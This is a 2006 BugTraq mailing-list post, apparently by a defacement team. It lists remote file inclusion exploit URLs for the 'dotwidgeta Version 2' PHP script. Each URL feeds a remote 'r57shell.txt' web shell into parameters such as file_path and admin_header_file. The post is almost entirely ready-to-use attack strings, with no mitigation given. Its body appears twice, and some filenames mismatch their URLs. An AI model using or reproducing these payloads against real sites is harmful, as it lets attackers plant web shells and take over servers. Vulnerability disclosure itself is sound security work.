BugTraq
Back to list
|
Post reply
file include exploits in dotwidgeta Version 2
Jun 16 2006 05:34PM
SWEET SWEET (gamr-14 hotmail com)
Multiple file include exploits in dotwidgeta Version 2
script type : dotwidgeta Version 2
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploits :
index.php
http://www.example.com/path/index.php?file_path=http://yoursite/r57shell
.txt?
ecrire.php
http://www.example.com/path/showcatpicks.php?file_path=http://yoursite/r
57shell.txt?
showarticle.php
http://www.example.com/path/showarticle.php?file_path=http://yoursite/r5
7shell.txt?
authors.php
http://www.example.com/path/admin/authors.php?admin_header_file=http://y
oursite/r57shell.txt?
authors.php
http://www.example.com/path/admin/authors.php?admin_footer_file=http://y
oursite/r57shell.txt?
articles.php
http://www.example.com/path/admin/articles.php?admin_footer_file=http://
yoursite/r57shell.txt?
index.php
http://www.example.com/path/admin/index.php?admin_header_file=http://you
rsite/r57shell.txt?
categories.php
http://www.example.com/path/admin/categories.php?admin_header_file=http:
//yoursite/r57shell.txt?
categories.php
http://www.example.com/path/admin/categories.php?admin_footer_file=http:
//yoursite/r57shell.txt?
editconfig.php
http://www.example.com/path/admin/editconfig.php?admin_header_file=http:
//yoursite/r57shell.txt?
editconfig.php
http://www.example.com/path/admin/editconfig.phpadmin_footer_file=http:/
/yoursite/r57shell.txt?
####################################################
#######################
emails:
gamr-14 (at) hotmail (dot) com [email concealed] & black-cod3 (at) hotmail (dot) com [email concealed]
#######################
All my respect to our friends , lezr.com
done .. peace
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
script type : dotwidgeta Version 2
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploits :
index.php
http://www.example.com/path/index.php?file_path=http://yoursite/r57shell
.txt?
ecrire.php
http://www.example.com/path/showcatpicks.php?file_path=http://yoursite/r
57shell.txt?
showarticle.php
http://www.example.com/path/showarticle.php?file_path=http://yoursite/r5
7shell.txt?
authors.php
http://www.example.com/path/admin/authors.php?admin_header_file=http://y
oursite/r57shell.txt?
authors.php
http://www.example.com/path/admin/authors.php?admin_footer_file=http://y
oursite/r57shell.txt?
articles.php
http://www.example.com/path/admin/articles.php?admin_footer_file=http://
yoursite/r57shell.txt?
index.php
http://www.example.com/path/admin/index.php?admin_header_file=http://you
rsite/r57shell.txt?
categories.php
http://www.example.com/path/admin/categories.php?admin_header_file=http:
//yoursite/r57shell.txt?
categories.php
http://www.example.com/path/admin/categories.php?admin_footer_file=http:
//yoursite/r57shell.txt?
editconfig.php
http://www.example.com/path/admin/editconfig.php?admin_header_file=http:
//yoursite/r57shell.txt?
editconfig.php
http://www.example.com/path/admin/editconfig.phpadmin_footer_file=http:/
/yoursite/r57shell.txt?
####################################################
#######################
emails:
gamr-14 (at) hotmail (dot) com [email concealed] & black-cod3 (at) hotmail (dot) com [email concealed]
#######################
All my respect to our friends , lezr.com
done .. peace
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]